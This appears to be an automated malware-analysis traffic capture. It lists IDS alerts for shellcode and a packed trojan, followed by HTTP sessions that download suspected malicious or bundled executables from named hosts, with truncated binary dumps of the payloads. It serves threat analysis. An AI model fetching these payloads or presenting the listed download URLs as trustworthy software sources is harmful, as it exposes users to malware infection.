ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET POLICY Outdated Windows Flash Version IE
ET POLICY Unsupported/Fake Internet Explorer Version MSIE 5.
ET POLICY Windows 98 User-Agent Detected - Possible Malware or Non-Updated System

Traffic

GET /ktv/9158chat2_ktv097_28140141.exe HTTP/1.1
Host:jh.01lm.com
Accept:*/*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Connection:Keep-Alive
Range: bytes=8139090-9495604


HTTP/1.0 206 Partial Content
Date: Tue, 13 Oct 2015 22:41:22 GMT
Content-Type: application/octet-stream
ETag: "-501244861"
Accept-Ranges: bytes
Last-Modified: Mon, 24 Aug 2015 03:34:09 GMT
Server: WS CDN Server
Content-Range: bytes 8139090-9495604/10852120
Content-Length: 1356515
Age: 1
Via: 1.0 lsh66:8104 (Cdn Cache Server V2.0), 1.0 jsly59:8080 (Cdn Cache Server V2.0), 1.0 nn11:8101 (Cdn Cache Server V2.0)
Connection: keep-alive
...Hx.di..y.V[[.....%4.......O..*!QY...T....:.O9.:.%...S... ...P..>
..t.W.@<.........,_..t..j.Dd....|.,.....*.DYzDcrv_M.....>8.a.4..
....K.Qk...e...i0......X.......j...O..g.d.T...O..7.F*d......L.>..rp
.>.:...O9..g....z[..&...3_Z.!..q.$.>.iR*?k.Y|...TWs....;..g..T.b
".....'.y.O)[email protected].~..sLV.:......j..6_.....J}@..DA..o.Q...8bC....[T
..7.V>..\........d.Q....a....7..j...k.(.&A.;o...G..N..G.KY~.?......
BQ...Ar.wd.\.M8d.4.Q.[....T9.q.........<7....z.f....D.~ *l*.Z .d7..
.\.cI...m.d.8IZ.J......).E...<......U.........2....p..Zu.!.....T...
.*....hn..6S.O.|..4/....# .F.|.rX..u..WH.!....k...j...F).h/0........15
......A=. ...r:.Q.\%@.H...\F.Q..W......U7.... ..u`o.V.......]*..?2..~.
..z.\.D.Cx*n.....MW....R{..u9....O1..m.pi.-.9.Q)...g..h.!K......o.oD..
`....M...l.......d..-=j;.:C..A............TQ........q.....$r..........
.0&....*..I.U..O.k.......&.......$.=.8Aje3....#h....r|J.....c*.*KI.$e#
w...:4L.m..b/..}.\.\..~W.......?..O..!..(.N..|....o.8.._L.1.nCg..P.DW.
.\..X(;.SW..........R:...55.qW...c..K...o...%a...U.I.U?R..........0er.
....Sk....K.:...E.........."....;.}....J7........T.0.[.w....Im'_..o..2
t....#.VE......S...&.zK.1..%...X<50.9(A./...G,...U[....#..q...[G.w/
.hte..... ..:..bZ..F..oi......}[email protected]...?..DY...iC.j.E..
@..J.xc...........Rq..h?..#..h.h.Ji...F.....wo...m...8.SL... ....C....
........ .I @"....].........u.a.[k....T)[email protected].|!...$.[..).&
lt;..DQ!..a^.\*'_cG.cN..cW..2{V0.Q...i.Q...L....(X.....sv&.J.;..J.-.&.
...#..(3.6.X.H.40..r.._.wv.......5.ED.E.j...`ZA.Z>.......5[..P.
<<< skipped >>>


GET /ditui/zujian/Baidu_Setup_1.6.200.359_ftn_1050103060.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: dlsw.br.baidu.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: JSP3/2.0.12
Date: Tue, 13 Oct 2015 22:40:20 GMT
Content-Type: application/octet-stream
Content-Length: 6831104
Connection: keep-alive
ETag: "554c7256-683c00"
Last-Modified: Fri, 08 May 2015 08:22:46 GMT
Expires: Tue, 24 Nov 2015 10:30:54 GMT
Age: 5054966
Cache-Control: max-age=8640000
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................p.......B...9............@..............
[email protected]..........
.Hq............h..#...................................................
........................................text....o.......p.............
..... ..`.rdata...*.......,...t..............@[email protected]....~...........
...............@....ndata.......0...........................rsrc...Hq.
......r..................@[email protected].......@[email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$...-G...i. @...T.....tUVW.q.3.;5.-G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5.-G.r.[_^...U..QQ
<<< skipped >>>


GET /fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/jm/1/ky?public&code=618009ec0030ff56d26737fbb6a007aa HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.153.147.73
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 13 Oct 2015 22:13:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8zb mod_jk/1.2.31
Content-Disposition: attachment; filename="ky"
Accept-Ranges: bytes
x-cdmi-object-size: 6485960
x-cdmi-create-time: 2015-09-02 13:48:11
Content-Length: 6485960
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream;charset=UTF-8
MZ......................@................................... .........
..!..L.!This program cannot be run in DOS mode....$.......i...-...-...
-....R..,.....Z./...$.Y.....$.F.....3.H.)...$.O......R..=....R..0...-.
......$.H.....$.^.,...3.X.,...-.[.,...$.].,...Rich-...................
........PE..L...8;.U.....................:V..............0....@.......
....................c.....Voc...@.............................:u......
,.........P...........b.......b.......................................
[email protected]...................
............ ..`.rdata.......0......................@[email protected]
...J...:[email protected].................@[email protected]
[email protected]..................................
......................................................................
......................................................................
......................................................................
............................................U..Q.M..E.P.M..=.....]....
......U......M..E.P.M..K........t#.U.R.M... ...M. .Q.U.R.M..&.........
E.... H.;M.v..U..B..E..M.;A.s../....}..vY.U..B..E..E.j..M.Q.M..}......
..t8.E.P.M.Q.U..E..J. H.Q.M.......U..B.P.=.......E.P.M.......E...]....
....U..Q.M..E.P.P .....P.M.Q.M........].............U..Q.M..E.P.M.....
.P.M..$....E...]..............U..Q.M..E.P.M.......M..A.P.M.......E...]
........U..Q.M..M..A.....]..............U..Q.M..E..@...]..............
..U..Q.M.j..E.P.M........]........U......M..E..H.;M.w5.U..B.;E.t*.
<<< skipped >>>

GET /fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/mm?public&code=412c89b951806641268495a46a262424 HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.153.147.73
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 13 Oct 2015 22:14:26 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8zb mod_jk/1.2.31
Content-Disposition: attachment; filename="mm"
Accept-Ranges: bytes
x-cdmi-object-size: 917568
x-cdmi-create-time: 2015-08-10 19:47:08
Content-Length: 917568
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream;charset=UTF-8
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$......."r.Mf...f...
f....\G.d...A...i...xAD.x...xAR.....A...E...f.......xAU.....xAE.g...xA
@.g...Richf...........PE..L......U.................`...~..............
.p....@..........................`.......(............................
..............h....`..t...............@...............................
[email protected][email protected]....^
.......`.................. ..`.rdata..8U...p...V...d..............@..@
[email protected]....`................
......@..@............................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................V.t$.....3....L$.....'....
.......D$.....RU.,2;...........F.SW.I.3...vj;.tj.....^......F..^.F....
[email protected][email protected][email protected][email protected]..
..F...;.r.;.u..L$._[ ....][email protected].......
[email protected]......@xE....@.=... D$.^[email protected]...@xE....=.
H..H.... D$.^.3.^..............D$.=....u......P...............S.\$.W.|
$.WS..\sE...u._[.VP..`sE.....t-WS..dsE..L$......v.......;.s........tV.
u.;.r.^_3.[........#.^_[..........V.t$......W.|[email protected]
<<< skipped >>>

GET /fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/zy2/zy?public&code=94979ed818604a3f6632db70c4686078 HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.153.147.73
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 13 Oct 2015 22:14:32 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8zb mod_jk/1.2.31
Content-Disposition: attachment; filename="zy"
Accept-Ranges: bytes
x-cdmi-object-size: 5592910
x-cdmi-create-time: 2015-08-20 15:54:27
Content-Length: 5592910
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/octet-stream;charset=UTF-8
......../...list_soft.xml.............................................
......................................................................
......................................................................
..............................................................t...blue
box.png...............................................................
......................................................................
......................................................................
..................................................hao123.png..........
......................................................................
......................................................................
......................................................................
...............................WO.BlueBoxSetup.exe....................
......................................................................
......................................................................
......................................................................
..................BlueNavigator_0_Setup.exe...........................
......................................................................
......................................................................
......................................................................
.<?xml version="1.0" encoding="UTF-8" ?>..<Profile>..    &
lt;SoftwareList SuitLabel="............;............;">..        &l
t;Group GroupId="0" name="............">..            <Softw
<<< skipped >>>


GET /fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/7gj1/7gj1?public&code=855660852431bcf426a5bae830564ee1 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.153.147.73
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 13 Oct 2015 22:13:43 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8zb mod_jk/1.2.31
Content-Disposition: attachment; filename="7gj1"
Accept-Ranges: bytes
x-cdmi-object-size: 9894214
x-cdmi-create-time: 2015-09-21 09:04:14
Content-Length: 9894214
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/octet-stream;charset=UTF-8
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......b.6 &.Xs&.Xs
&.Xs.r*s*.Xs.p&s/.Xs.r%s..Xs.r5sa.Xs...s .Xs/..s$.Xs&.Ys..Xs...s..Xs.r
6s..Xs.r"s'.Xs.r$s'.Xs&.Xs'.Xs.r s'.XsRich&.Xs........................
PE..L......U................. ..........p........0....@...............
........... ..........................................Au......h.......
.1..............`............8..................................@.....
.......0...............................text............ ..............
.... ..`.rdata.......0.......0..............@[email protected]........@...@...@
[email protected].......@..................@..@............
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................
<<< skipped >>>

GET /fsintf/c9f2549fce18f4dc4ae13d6a6527d9c4e/5/2k?public&code=bc96045fad7c5e598098b4c38960a58f HTTP/1.1


Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: 180.153.147.73
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 13 Oct 2015 22:14:48 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8zb mod_jk/1.2.31
Content-Disposition: attachment; filename="2k"
Accept-Ranges: bytes
x-cdmi-object-size: 12603632
x-cdmi-create-time: 2015-08-13 17:03:23
Content-Length: 12603632
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: application/octet-stream;charset=UTF-8
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........[7..:Y..:Y.
.:Y...4..:Y..."..:Y..:X..:Y..B...:Y..h...:Y..B...:Y.Rich.:Y...........
..............PE..L...w)CO.................h...4......J7............@.
[email protected]....................................
[email protected]..........................................
.....................................................text...6g.......h
.................. ..`.rdata...............l..............@[email protected]...
[email protected]...@............................
[email protected]..................@..@............................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
.$.B..H.P.u..u..u...|[email protected],[email protected].....@
..}[email protected]... M..........M........E...FQ.....NU..M
.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.P.u
[email protected]}[email protected].}.j.W.E......E.......P
[email protected][email protected][email protected] ....E..E.Pj.h [email protected]..
...@._^3.[.....L$..H.B...i......T.....tUVW.q.3.;5L.B.sD..i......D..S..
...t.G.....t...O..t .....u...3....3...F.....;5L.B.r.[_^...U..QQ.U.
<<< skipped >>>


GET /ptlogin/v4/style/0/images/icons.gif HTTP/1.1
Accept: */*
Referer: hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: imgcache.qq.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 13 Oct 2015 22:41:22 GMT
Server: PWS/8.1.20.22
X-Px: ms h0-s1174.p11-fra ( h0-s1214.p11-fra), ht-d h0-s1214.p11-fra.cdngp.net
ETag: "5506987c-1ede"
Cache-Control: max-age=7200
Expires: Tue, 13 Oct 2015 23:31:33 GMT
Age: 4189
Content-Length: 7902
Content-Type: image/gif
Last-Modified: Mon, 16 Mar 2015 08:46:52 GMT
Connection: keep-alive
GIF89as.r.................................................^....A......
.............! ............B.....}....................1)-t............
........j...........................................................c.
.>..p[E............z...........q.....u.....j.......................
..................Z.................b.................................
.................^................................!.......,....s.r....
.'..........X......'...............................X..................
...........X......................................)....Fz%.K.1.......*
\......#J.H.....3".........I.....'K.S..e..0..\).&..-m...RgO.3w..94(..F
..T.t...P.J.J.*..X...*....%Fr.K....h..].....p....KWn..x....p...'..\...
.... ^......#[email protected].......
|....q ..{.....K...te...k..0...'....F......_.........O..............z.
...B.Y_:.....6.........ZP...b(a..n.!......!.8..".h..(..b.0....2.x..8..
..;>...@.._.D.i...&i`..q.1..PF)..P>Y..Db...\....^....Y.Y&.[..&._
....o....r....l.y..|......J....j(.5$...p\..gIzV..p.....f....v.....*...
.j.............".....j..<........... ....k...&....6...MD m...X...8.
...L.....;m.........n....n........ko...................0..$....7....G,
....`...< ........C ...$.l.....2.*[.2./.... ..2.7..3.;.,..<....=
.-t.H..t.L....PG-..TS...Xg...(t.5...$.....I......_....p{..._....(..w.|
....}..w...>.............G....W....d....w.y......].`..80 6.........
....n............../....o|..$..........Q..U...GF0....w...../.....o....
.........3 [email protected]......:......'H..Z.......
<<< skipped >>>


GET /Downloaderconfig.aspx?imgtype=9158 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: tj.9158.com
Connection: Keep-Alive
Cookie: ASP.NET_SessionId=vmguug55irtjcdnc010df1bg


HTTP/1.1 200 OK
Date: Tue, 13 Oct 2015 22:41:21 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 948
X-Via: 1.1 kf50:10 (Cdn Cache Server V2.0)
Connection: keep-alive
..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "h
ttp://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html 
xmlns="hXXp://VVV.w3.org/1999/xhtml" >..<head><title>..
...............</title></head>..<body style=" margin:0p
x">..    <form name="form1" method="post" action="Downloaderconf
ig.aspx?imgtype=9158" id="form1">..<div>..<input type="hid
den" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUJOTU4MjMyMzI1ZG
TU5ZBXmwe1gDNP/W SPke44 A65Q==" />..</div>..<div>...<
;input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERA
TOR" value="91FFCAD5" />..</div>..    <div>..      ..  
       <object >..        ..              <embed  src="http:/
/tj.9158.com/temp/flash/1.swf"  width="490px" height="180px" quality="
high" pluginspage="hXXp://VVV.macromedia.com/go/getflashplayer" type="
application/x-shockwave-flash" wmode="transparent" ></embed>.
.          </object>.. ..    </div>..    </form>..&l
t;/body>..</html>....



GET /stat/index.php?pcid=e06b40e4c7ee2608455420c2f88bfbce&app=kuaizip&ver=2.8.2.3&channel=7654_1061607&category=Kuaizip_Setup_7654_1061607.exe&act=app_install_start&p1=&p2=&key=f86cfb0bbad855f1a10c4fd2071a1816 HTTP/1.1
Accept: text/html,application/xhtml xml,application/xml;q=0.9,*/*;q=0.8

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:14.0) Gecko/20100101 Firefox/14.0.1
Host: stat.kpzip.com
Cache-Control: no-cache


HTTP/1.1 400 Bad Request
Server: nginx/1.4.1
Date: Tue, 13 Oct 2015 22:41:04 GMT
Content-Type: text/html
Content-Length: 172
Connection: close
<html>..<head><title>400 Bad Request</title>&l
t;/head>..<body bgcolor="white">..<center><h1>400
 Bad Request</h1></center>..<hr><center>nginx/
1.4.1</center>..</body>..</html>....



GET /ktv/9158chat2_ktv097_28140141.exe HTTP/1.1
Host:jh.01lm.com
Accept:*/*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Connection:Keep-Alive
Range: bytes=2713030-4069544


HTTP/1.0 206 Partial Content
Date: Tue, 13 Oct 2015 22:41:22 GMT
Content-Type: application/octet-stream
ETag: "-501244861"
Accept-Ranges: bytes
Last-Modified: Mon, 24 Aug 2015 03:34:09 GMT
Server: WS CDN Server
Content-Range: bytes 2713030-4069544/10852120
Content-Length: 1356515
Age: 1
Via: 1.0 lsh66:8104 (Cdn Cache Server V2.0), 1.0 jsly59:8080 (Cdn Cache Server V2.0), 1.0 nn11:8101 (Cdn Cache Server V2.0)
Connection: keep-alive
...pW..P.z.........`9..@....".>.......ol..n.j..._....C..8P.... ....
..]........(.Q..8..c.P..z"}.U.S.>.Z.zS.;C!.?.CG*...x.p.......w.-...
I.....Nx........;\..r:#G.#..P.a..X...F<W......G.,~.....V'8....A9...
Kq...m.,..-:.~...{..^.P&....0[B.......`...b...t-....x..L....s...I..Ym.
....B.D....!..8tF....u5...#..C.A.......x.b...K..^.....?.1.3.'.&/~Z.l.x
.E.V .X1..:......}M!Q..x.._#:5.......x....><5.E=..s...o.........
.X...gP.. .....t..a..".=..Q.Q.j......U?....M..4..t...UG...b..m..].K&=h
..t.._....^B.#...'E0.d.H.._h.P.uC..p_....EV.%G.|..c..K.vU....0r...).d4
,.Ib.!Z...:.jj......e.........r6e..z.B7...B\..7!...$ur..SkF..J..?.].{x
...?..K^."!........D.........MY...Q.......j..U...n....yO5.g.F..0.\.d..
..a.... 8....)._..jKn\......U).C....F0*d.....?...b|E.....N}....._..h.O
Z.q.......|J.G..K.a6F.t.._F1...;S......I.0.<.....kT.S...*....n7...t
iq....Q....../....\e......:.Nv.:O..k$/.l...Ni..-h..........`..d......;
A|.....d.........m....@.~.........t...:p....s.x9..6..t!._X.R|.? H...0j
.I.[.Cz...g........._>K......f.nlf....c.q9....I.r...\.......A/."~..
v..".Aé....".....T.h..Zd.].f..s....t..n..G.9.......?.nX&..x..x>.B
.W.*....9.....0..........$,\F...{.'.......n..>_..C.E5...R...I....\D
..<..._n>...{3.).b..PX..~...?.,zv6Q...:K.X.E...S<s).wh..,....
.9e.'.Q.#..5Z....Ha.aLnj:..o%".G&f....\A...._h.C..%h..kB...P9.......zs
.......Q.........n......Q....*E.....{N%.......B....p|8'..?...Ng..>.
..&......8^!b.l?j......Dq..{][email protected](..zPp8.T...#...N.....&.{&...n..
.v._.N......R.E.....2.i.. ... .NB.m...S.T..Q..A..O..!...2[...w./..
<<< skipped >>>


GET /cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=1&jumpname=&appid=549000912&ptcss=undefined&param=u1%3Dhttp%253A%252F%252Fqun.qzone.qq.com%252Fgroup&css=&mibao_css=&s_url=http%3A%2F%2Fqun.qzone.qq.com%2Fgroup&low_login=0&style=12&authParamUrl=&needVip=1&ptui_version=10028 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: xui.ptlogin2.qq.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Connection: keep-alive
Keep-Alive: timeout=50, max=1024
Server: QZHTTP-2.38.20
Date: Tue, 13 Oct 2015 22:41:21 GMT
P3P: CP="CAO PSA OUR"
Cache-Control: max-age=604800
Set-Cookie: pt_local_token=489457601; PATH=/; DOMAIN=ptlogin2.qq.com;
Last-Modified: Thu, 08 Mar 2012 02:04:00 GMT
Content-type: text/html
Content-Length: 5460
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "htt
p://VVV.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmln
s="hXXp://VVV.w3.org/1999/xhtml"><head><meta http-equiv="C
ontent-Type" content="text/html; charset=utf-8"><style type="tex
t/css">u{text-decoration:none}body{font-family:Tahoma,Verdana,Arial
,......;font-size:12px;margin:0}.clear{clear:both;font-size:0;line-hei
ght:0;height:0}#login{margin:0 auto;float:none;width:320px;padding:0 0
 10px 50px}.linemid{padding:10px 8px 0 30px;color:gray}.btn_select,.bt
n_gray{border:0;color:#2473a2;width:103px;height:28px;padding-left:2px
;cursor:pointer;font-weight:bold;font-size:14px}.btn_select{background
:url(hXXp://imgcache.qq.com/ptlogin/v4/style/0/images/icons.gif) no-re
peat -102px -130px}.btn_gray{background:url(hXXp://imgcache.qq.com/ptl
ogin/v4/style/0/images/icons.gif) no-repeat -102px -225px}#login #list
_uin img{padding:7px;background:url(hXXp://imgcache.qq.com/ptlogin/v4/
style/0/images/icons.gif) no-repeat 0 -329px}#list_uin li{list-style:n
one;padding:0 0 0 28px; padding-left:12px;width:270px;word-wrap:break-
word;min-height:20px;clear:both}#list_uin li input{float:left;margin-b
ottom:5px;width:20px}#list_uin label{margin:2px 0 0 4px;float:left;wid
th:220px}#login p{padding:8px 15px 12px 32px;margin:0;font-size:12px;c
olor:#535353}.x_lowLogin{padding:10px 0 0 28px;display:none}</style
><script>var g_begTime=new Date();..(function(){...window.one
rror = function(msg,url,line){....var reportUrl = location.protoco
<<< skipped >>>


GET /ktv/9158chat2_ktv097_28140141.exe HTTP/1.1
Host:jh.01lm.com
Accept:*/*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Connection:Keep-Alive
Range: bytes=6782575-8139089


HTTP/1.0 206 Partial Content
Date: Tue, 13 Oct 2015 22:41:22 GMT
Content-Type: application/octet-stream
ETag: "-501244861"
Accept-Ranges: bytes
Last-Modified: Mon, 24 Aug 2015 03:34:09 GMT
Server: WS CDN Server
Content-Range: bytes 6782575-8139089/10852120
Content-Length: 1356515
Age: 1
Via: 1.0 lsh66:8104 (Cdn Cache Server V2.0), 1.0 jsly59:8080 (Cdn Cache Server V2.0), 1.0 nn11:8101 (Cdn Cache Server V2.0)
Connection: keep-alive
[.!<..]..%m.T..Q.o....z..5.g.(Y..*4..e.X..? p.....y.?....H....X.w8X
.'.....q...K..\...K.....<F....Z.%.n.....B.Q.. ..,ABY..R...B......?9
.w.B.~.2}.~|.e..1...P....;.F9..g.gW...QH~..zw.P.}$=..v........."..Ik..
a.C.....4..dx.!#m.wq...m.>I?..;.>x.-xi......9....54..p3%W"....].
.Rr*J...Q.........,H..l[6..@y...... x,R.......,p<T..g.|T?..e..83...
.2Yz.-t...vEl.I]...<!...JY...\..)8....N.!.... ...l\[U....,.%.....k.
..<.Rn. ~.0...?...,.j..(.1L....N.M...x:P..o4.............. @..mP...
[email protected].>T..I..,..>F.vL....{.|-.6......... ...E.M.o..]@|...l
....W........5...,. _w.a 2..K......x..T."........7u ...:........E...@o
.^..*.........%[email protected]|.8>0..s=..a..zo8...L5m.0..,.;.&E.
w..&....n...l.#>[email protected]....
......tB...`y....[......t..g....Y.%[email protected]..(m._..<E.o./;.
Z...1. .6..f....H.5T4.......1.4/.o..]..c.......v#7<....B.,vz8g.I...
[.a...G..jW. **\.J.c.m..}[email protected]...
....16.0.....:.......F.............Wn. .U...#.v;n...y!......K.QK..(1..
r..Hd....H.l}...d...)&g..s...n]......o. ...zBX.....:k.;Ji.8...T1..g..M
..y......o.:...U .....%[k.A....2.^...].U...;.zA..bZ./.7......NLQ5X....
5..=n.e.:53....;3 m.....Y...-.3........e(..7.I...i..I.l.n.....r.O.o.4.
....1....-.$...]c..#...T.....Hk9.I.|....`.k..L.....z?.]..N....B.!.?vtl
...BE,.8....c.<..R...p......r .X...D..yj... ]...q.(/..B;t.8..iM....
.F..9......2....6..W. ...!.6.x.F.L.<.Q..#..SD.EJ...,..V....f.. ...Y
..h.....y....J6.=v..J......n..8.$d.U..}.M..EK...."...A1l.kE..k...0
<<< skipped >>>


GET /ktv/9158chat2_ktv097_28140141.exe HTTP/1.1
Host:jh.01lm.com
Accept:*/*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Connection:Keep-Alive


HTTP/1.0 200 OK
Date: Tue, 13 Oct 2015 22:41:22 GMT
Content-Type: application/octet-stream
ETag: "-501244861"
Accept-Ranges: bytes
Last-Modified: Mon, 24 Aug 2015 03:34:09 GMT
Content-Length: 10852120
Server: WS CDN Server
Via: 1.0 lsh66:8104 (Cdn Cache Server V2.0), 1.0 jsly59:8080 (Cdn Cache Server V2.0), 1.0 nn11:8101 (Cdn Cache Server V2.0)
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1H..u)..u)..
u)...&..w)..u)...)...&..d)...6...).../..t)..Richu)..........PE..L.....
:J.................\...........2.......p....@.........................
. ......=........................................s...........d........
...x..@............................................................p..
.............................text....[.......\.................. ..`.r
data.......p.......`..............@[email protected]..........
[email protected][email protected]
..............@..@....................................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
..>[email protected].>[email protected]
...Pr@..}..e..9}[email protected]........ M............U....M....3..
.3..FQ......3..NU.....M..........VT..U.....FP..E...............E.P.M..
[email protected]@..u....E..9}[email protected].}.j
[email protected]@[email protected] ...Pj.h.6B.W..Xr@.
.u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.
;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F..
<<< skipped >>>


GET /ktv/9158chat2_ktv097_28140141.exe HTTP/1.1
Host:jh.01lm.com
Accept:*/*
User-Agent:Mozilla/4.0 (compatible; MSIE 5.00; Windows 98)
Connection:Keep-Alive
Range: bytes=1356515-2713029


HTTP/1.0 206 Partial Content
Date: Tue, 13 Oct 2015 22:41:22 GMT
Content-Type: application/octet-stream
ETag: "-501244861"
Accept-Ranges: bytes
Last-Modified: Mon, 24 Aug 2015 03:34:09 GMT
Server: WS CDN Server
Content-Range: bytes 1356515-2713029/10852120
Content-Length: 1356515
Age: 1
Via: 1.0 lsh66:8104 (Cdn Cache Server V2.0), 1.0 jsly59:8080 (Cdn Cache Server V2.0), 1.0 nn11:8101 (Cdn Cache Server V2.0)
Connection: keep-alive
.G..D..`0"!.....i...\..~.....6.(..H.n9A.D`...8...e./....&W.].jft.....B
...|\.@b/....3.1..W....;.F3..N..G.</..=..H....3.]18b-.iC...:...j...
.......zM.X-.F..Fp.o{..|%...o.R...v..G..e.i.<.*~..o.L..R...x3k..&..
 .c.;....^[email protected].....^&47\..'. .G:............#)..
.....Lo....d!.......:u'....Q%.ET..'..*...o...?.a.8......3.`.cl.lva.2md
S!.... ..K......U.^3.l.E.4;..)...t.l.&.8...w...7.$.>.t..q..<.}..
